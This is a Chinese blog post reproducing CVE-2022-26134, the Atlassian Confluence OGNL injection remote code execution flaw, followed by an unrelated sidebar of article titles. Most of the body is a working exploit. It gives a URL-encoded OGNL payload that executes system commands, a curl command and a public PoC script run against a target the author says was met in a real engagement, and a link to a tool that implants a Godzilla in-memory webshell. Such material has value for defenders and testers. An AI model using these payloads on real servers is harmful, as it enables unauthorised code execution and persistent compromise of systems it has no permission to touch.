当前位置:网站首页>Confluence OGNL注入漏洞复现(CVE-2022-26134)
Confluence OGNL注入漏洞复现(CVE-2022-26134)
2022-07-30 17:43:00 【云舒_YunShu】
Confluence OGNL注入漏洞复现(CVE-2022-26134)
影响范围
Confluence Server&Data Center ≥ 1.3.0
Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1
漏洞成因
Atlassian Confluence存在远程代码执行漏洞,2022年6月2日,Atlassian发布安全公告,公布了一个Confluence Server和Data Center中的远程代码执行漏洞。详细分析可参考:
https://www.anquanke.com/post/id/274026
漏洞利用
环境准备
名称 | IP |
---|---|
攻击机 | 192.168.159.128 |
靶机 | xxx.xxx.xxx.xxx |
此处的靶机是我在实战里遇到的,另外该漏洞vulhub还未曾引入。
靶机截图如下:
漏洞复现
手动复现
POC:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/
测试:
curl -vv "http://xxx.xxx.xxx.xxx:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/"
可以看到如下图所示:
工具复现
准备好生成POC工具:cve-2022-26134.py
工具地址:https://github.com/Nwqda/CVE-2022-26134
然后执行下方的命令:
python cve-2022-26134.py "http://xxx.xxx.xxx.xxx:8090/" "id"
可以看到此漏洞利用成功!
附:一键连接哥斯拉生成工具:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
边栏推荐
- [HarekazeCTF2019] Avatar Uploader 1
- 千亿级、大规模:腾讯超大 Apache Pulsar 集群性能调优实践
- MySQL中的存储过程(详细篇)
- matlab simulink锂离子电池智能充电策略研究
- 基于亚马逊云科技无服务器服务快速搭建电商平台——性能篇
- bean的生命周期
- Arranger software FL Studio Chinese version installation tutorial and switching language tutorial
- 基于模糊PID的液压舵机伺服系统
- 论文阅读之《Underwater scene prior inspired deep underwater image and video Enhancement (UWCNN)》
- SQL行列转换
猜你喜欢
Error occurred while trying to proxy request项目突然起不来了
Metaverse Web 3.0 和 DeFi大师班
Web 3.0入门教程
ERROR 2003 (HY000) Can't connect to MySQL server on 'localhost3306' (10061)Solution
Hangzhou electric school game 2 1001 2022 Static Query on Tree (Tree + hash table difference chain subdivision
多年以后「PageHelper」又深深的给我上了一课
UE5第一人称射击游戏蓝图教程
windwons 下GPU环境和pytorch安装
SYSCALL SWAPGS
C# 连接SQL Sever 数据库与数据查询实例 数据仓库
随机推荐
Dodging ice cream assassins?Crawling ice cream prices through crawlers
主流的深度学习推理架构有哪些呢?
论文阅读之《Quasi-Unsupervised Color Constancy 》
ARC在编译期和运行期做了什么
JMeter Notes 4 | JMeter Interface Introduction
JMeter笔记4 | JMeter界面介绍
基于stm32的shell实现
LayaBox---TypeScript---变量声明
Informatics Olympiad All-in-One 1966: [14NOIP Popularization Group] Scale Simplification | Luogu P2118 [NOIP2014 Popularization Group] Scale Simplification
Test the.net text to Speech module System. Researched
mysql刷脏的几种场景以及相关参数
Ecplise执行C语言报错:cannot open output file xxx.exe: Permission denied
Mo Team - Elegant Violence
PyTorch 猫狗分类源代码及数据集
关于内和调试无法查看ntdll内存的问题
Error EPERM operation not permitted, mkdir ‘Dsoftwarenodejsnode_cache_cacach两种解决办法
18.支持向量机(SVM)的介绍
Microsoft Office 2019 software download and installation detailed tutorial!
Py程序员的七夕情人节
信息学奥赛一本通 1915:【01NOIP普及组】最大公约数与最小公倍数 | 洛谷 P1029 [NOIP2001 普及组] 最大公约数和最小公倍数问题